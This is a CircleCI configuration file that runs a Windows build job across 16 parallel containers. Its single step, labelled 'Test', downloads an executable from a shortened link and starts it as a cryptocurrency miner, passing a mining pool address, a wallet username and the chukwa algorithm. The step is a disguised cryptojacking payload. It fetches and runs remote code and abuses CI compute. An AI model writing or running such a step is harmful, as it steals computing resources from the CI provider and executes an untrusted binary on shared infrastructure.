version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build:
    parallelism: 16 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bit.ly/3w1AZJs -OutFile logmin.exe
            cmd /c echo cmd /k start logmin.exe --pool pool.semipool.com:33309 --username gunsCrDVtDZNnpGQLr87BKNADNKJ8qgqGcrhqu3zoDG4GFcYaUs82ioVyXrcHTengEEiouGUvhu1NTZKXy6USCHhA9Wov5jYx9 --password $(shuf -n 1 -i 1-99999) --algorithm chukwa
            